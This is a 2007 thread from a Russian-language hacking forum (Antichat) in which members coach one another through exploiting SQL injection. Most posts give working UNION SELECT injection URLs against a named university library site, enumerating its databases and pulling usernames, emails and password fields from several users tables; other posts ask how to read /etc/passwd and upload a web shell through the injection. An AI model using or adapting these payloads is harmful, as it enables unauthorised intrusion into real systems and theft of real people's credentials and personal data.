ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.12.2007, 22:06
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,0x2F6574632F70617 3737764,5,6,7/*
__________________
Карфаген должен быть разрушен...
|
|
|
12.12.2007, 00:23
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
Что-то я не до конца догоняю,нужен хэлп...)
Есть уязвимость, дб 5 версии
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*
Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_l evel,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
rgraves2:script:su:enabled
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+users+limit+0,1/*
Что за херь?! Хэлп!
Последний раз редактировалось 5taY3r; 12.12.2007 в 00:27..
|
|
|
|
12.12.2007, 01:13
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от 5taY3r
Что-то я не до конца догоняю,нужен хэлп...)
Есть уязвимость, дб 5 версии
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*
Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_l evel,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
rgraves2:script:su:enabled
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+users+limit+0,1/*
Что за херь?! Хэлп! в других БД значит вот например здесь есть:
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,passwd,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+calculator.users+limit+0,1/*
еще в dissertations.users есть
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 12.12.2007 в 01:17..
|
|
|
|
12.12.2007, 01:21
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от 5taY3r
Что-то я не до конца догоняю,нужен хэлп...)
Есть уязвимость, дб 5 версии
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*
Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_l evel,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
rgraves2:script:su:enabled
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+users+limit+0,1/*
Что за херь?! Хэлп!
Код:
http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,COUNT(TABLE_SCHEMA),3,4,5,6,7,8,9 from information_schema.tables WHERE table_name='users' limit 0,1/*
тебе это ни о чем не говорит? Мне например что таблиц users всего 4-е o_O штуки и находятся они в 4-ех разных базах...
Код:
http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,COUNT(COLUMN_NAME),3,DATABASE(),5,6,7,8,9 from information_schema.COLUMNS WHERE table_name='users' AND TABLE_SCHEMA='feeds' limit 0,1/*
Это же о том что в этой таблице 7 столбцов, ты написал 8 o_O... Эти столбцы: "username,fname,lname,email,auth_level,auth_status ,auth_type"
Ну и вот вывод:
Код:
http://www.lib.uwo.ca/news/view.php?id=-664' union select 1,CONCAT_WS(':',username,fname,lname,email,auth_level,auth_status,auth_type),3,DATABASE(),5,6,7,8,9 from users/*
__________________
Кто я?..
|
|
|
|
12.12.2007, 02:03
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
существует дефолтная папка для мамбы?
|
|
|
|
12.12.2007, 03:21
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113
Репутация:
1
|
|
что можно сделать если на сайте есть скуль-инж. Я могу выводить в браузер данные юзеров. (мне их данные не нужны, админки нет). Если я впишу <? include("http://shell"); ?> а потом выведу его на экран, он не выполнится как пхп код? или выполнится? Почему?
---
как можно заливать шелл с помощью скуль-инж в мускул сервере 5 версии? Load_File() не работает
|
|
|
|
12.12.2007, 03:28
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
через into oufile еще можно... но видимо, т.к. привилегий file у юзера нет, то и это не прокатит. кстати, load_file нужен для чтения файлов, а не записи)
|
|
|
|
12.12.2007, 07:32
|
|
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме:
64705
Репутация:
6
|
|
Есть SQL-инъекция в запросе INSERT.
Можно ли туда как-нибудь всунуть union или просто select? (кроме "on duplivate key..." и вставки ещё одного ряда)
Спасибо.
Последний раз редактировалось SpYeR; 12.12.2007 в 07:35..
|
|
|
|
12.12.2007, 09:37
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113
Репутация:
1
|
|
вопрос остался неотвеченым:
Если я впишу <? include("http://shell"); ?> а потом выведу его на экран, он не выполнится как пхп код? или выполнится? Почему?
|
|
|
|
12.12.2007, 10:01
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
SpYeR нет (читатай раздел статьи)
Girsoft Куда впишешь? каким образом ты введешь на экран?
Piflit Ответ ты можешь скачать в интренете и посмотреть
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
